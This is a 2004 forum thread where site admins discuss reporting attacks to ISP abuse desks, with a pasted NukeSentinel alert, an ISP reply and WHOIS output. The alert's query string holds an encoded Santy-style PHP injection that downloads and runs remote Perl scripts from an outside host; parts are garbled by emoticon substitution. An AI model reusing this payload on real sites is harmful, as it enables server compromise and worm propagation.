Do you report hacking attempt to abuse@ ?

Worker Joined: Aug 02, 2004 Posts: 165

Do you report hacking attempt to abuse@hackers_isp.com if you found out that somebody has tryed to hack or messup with your site?

I don't know that does this help but I'll forward nukesentinel alerts to the abuse@ email address.

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

I do if it's US based. I have had reasonably good success with AOL, ComCast, and a few others.

Client Joined: Apr 10, 2004 Posts: 649 Location: UK

I hadnt, but I did think it would be a good idea if it could be written into sentinel somehow.

Posted: Sun Dec 26, 2004 5:12 pm

Somewhere along the line the user has to take accountability Wink

Posted: Sun Dec 26, 2004 6:07 pm

Yea we cant rely too much on the experts lol

I'll make sure I email abuse in future then hehhee

Posted: Mon Dec 27, 2004 10:07 am

I've never did it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far.

registered · New Member Joined: Dec 24, 2004 Posts: 5

manunkind wrote:

I've never did it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far.

Would you mind sharing some of the responses you've gotten so far and which ISP that responded?

I wouldn't mind having a list of some sorts of ISP's that really do take abuse serious and will actually respond.

Before I implemented Raven's quick fix, I had received over 500 e-mails from Sentinel banning IP's in less than 24 hours. Something like that would be hard to e-mail the various IP owners, but it's something I would do over a period of a week or so.

Thanks,

Viper

Client Joined: Dec 24, 2004 Posts: 194 Location: Michigan

heres 1 i sent with the info and the reply to what i sent....
*EDITED FOR MY SECURITY* Wink

ha ha

Merry Christmas.

Thanks for your feedback. The server in question is owned and managed
by one of our customers. He has had an intruder on the machine or been
attacked by a worm. He has fixed the problem now.

Dag Øien
Domeneshop AS

På 25. des 2004 kl. 03:29 skrev <me@mysite.org>:

> From [ Only registered users can see links on this board! Get registered or login! ] Fri Dec 24 17:59:16 2004
>
> X-Apparently-To:
> [ Only registered users can see links on this board! Get registered or login! ] via XXX.XXX.XXX.XXX; Fri, 24 Dec 2004
> 17:58:19 -0800
>
> Authentication-Results:
> XXXXXX.mail.XXX.yahoo.com from=mysite.com;
> domainkeys=neutral (no sig)
>
> X-Originating-IP:
> [XX.XXX.XXX.XXX]
>
> Return-Path:
> <root@hostXX.myhost.com>
>
> Received:
> from XXX.XXX.XXX.XXX (HELO hostXX.myhost.com) (XX.XX.XXX.XXX) by
> mta328.mail.scd.yahoo.com with SMTP; Fri, 24 Dec 2004 17:58:18 -0800
>
> Received:
> (mail XXXX invoked by uid XXXX); 25 Dec 2004 01:59:16 -0000
>
> Delivered-To:
> [ Only registered users can see links on this board! Get registered or login! ]
>
> Received:
> (mail XXXX invoked by uid XX); 25 Dec 2004 01:59:16 -0000
>
> Date:
> 25 Dec 2004 01:59:16 -0000
>
> Message-ID:
> <XXXXXXXXXX.myhost.com>
>
> To:
> [ Only registered users can see links on this board! Get registered or login! ]
>
> Subject:
> Blocked on My site.com
>
> From:
>
>
> X-Mailer:
> NukeSentinel™
>
> Content-Length:
> 797
> Date & Time: 2004-12-24 17:59:15
> Blocked IP: 194.63.250.67
> User ID: (1)
> Reason: Abuse-Script
> --------------------
> User Agent: lwp-trivial/1.41
> Query String:
> [ Only registered users can see links on this board! Get registered or login! ]
> name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)
> %252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr
> (119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%2
> 52echr(119)%252echr(119)%252echr(46)%252echr(119)%252echr(101)%252echr(
> 9 Cool

%252echr(109)%252echr(97)%252echr(115)%252echr(116)%252echr(101)%252
> echr(114)%252echr(45)%252echr(105)%252echr(116)%252echr(46)%252echr(105
> )%252echr(116)%252echr(47)%252echr(116)%252echr(101)%252echr(114)%252ec
> hr(114)%252echr(111)%252echr(114)%252echr(9 Cool

%252echr(111)%252echr(116)
> %252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr
> (112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(116)%2
> 52echr(101)%252echr(114)%252echr(114)%252echr(111)%252echr(114)%252echr
> (9 Cool

%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%25
> 2echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(1
> 16)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252e
> chr(119)%252echr(101)%252echr(9 Cool

%252echr(109)%252echr(97)%252echr(115)
> %252echr(116)%252echr(101)%252echr(114)%252echr(45)%252echr(105)%252ech
> r(116)%252echr(46)%252echr(105)%252echr(116)%252echr(47)%252echr(116)%2
> 52echr(101)%252echr(114)%252echr(114)%252echr(111)%252echr(114)%252echr
> (119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%2
> 52echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(
> 114)%252echr(108)%252echr(32)%252echr(116)%252echr(101)%252echr(114)%25
> 2echr(114)%252echr(111)%252echr(114)%252echr(119)%252echr(111)%252echr(
> 114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%2
> 52e%2527
> Forwarded For: none
> Client IP: none
> Remote Address: 194.63.250.67
> Remote Port: 53540
> Request Method: GET
> --------------------
> DNSStuffDNSStuffSorry, you have triggered our rate limiting system.
> Please try again later. If you are reading this in a web browser, we
> apologize -- we want you to use the site as much as you like. What we
> do
> not like is when people use automated programs with our free service.
> We have the addresses [ Only registered users can see links on this board! Get registered or login! ] and [ Only registered users can see links on this board! Get registered or login! ] here in case
> spammers are harvesting addresses from our site. If you are not
> automatically removed within a few minutes, you can contact us (using
> our info@
> address at the domain in the URL you are at; please refer to 43ddeb42)
> to
> get access again more quickly. Thanks!
>
>
> WHOIS results for 194.63.250.67
>
> Generated by [ Only registered users can see links on this board! Get registered or login! ]
> Country: EU
>
> ARIN says that this IP belongs to RIPE; I'm looking it up there.
>
>
> Using 0 day old cached answer (or, you can get fresh results).
> Hiding E-mail address (you can get results with the E-mail address).
>
> % This is the RIPE Whois query server #2.
> % The objects are in RPSL format.
> %
> % Rights restricted by copyright.
> % See [ Only registered users can see links on this board! Get registered or login! ]
>
> inetnum: 194.63.248.0 - 194.63.255.255
> netname: NO-HYPNOTECH
> descr: Hypnotech AS
> descr: Local ISP
> country: NO
> admin-c: HH2777-RIPE
> tech-c: HH2777-RIPE
> status: ASSIGNED PI
> notify: ***********@hypnotech.com
> notify: ****@global-ip.net
> mnt-by: RIPE-NCC-HM-PI-MNT
> mnt-by: GLOBALONE-MNT
> changed: **********@ripe.net 19991109
> source: RIPE
>
> route: 194.63.248.0/21
> descr: DOMENESHOP
> origin: AS12996
> notify: **********@domeneshop.no
> mnt-by: AS12996-MNT
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
> role: Domeneshop Hostmaster
> address: Domeneshop AS
> address: Nedre vaskegang 6
> address: NO-0186 Oslo
> address: Norway
> phone: +47 22 94 33 33
> fax-no: +47 22 94 33 34
> e-mail: **********@domeneshop.no
> admin-c: SS784
> tech-c: SS784
> nic-hdl: HH2777-RIPE
> notify: **********@domeneshop.no
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
>
>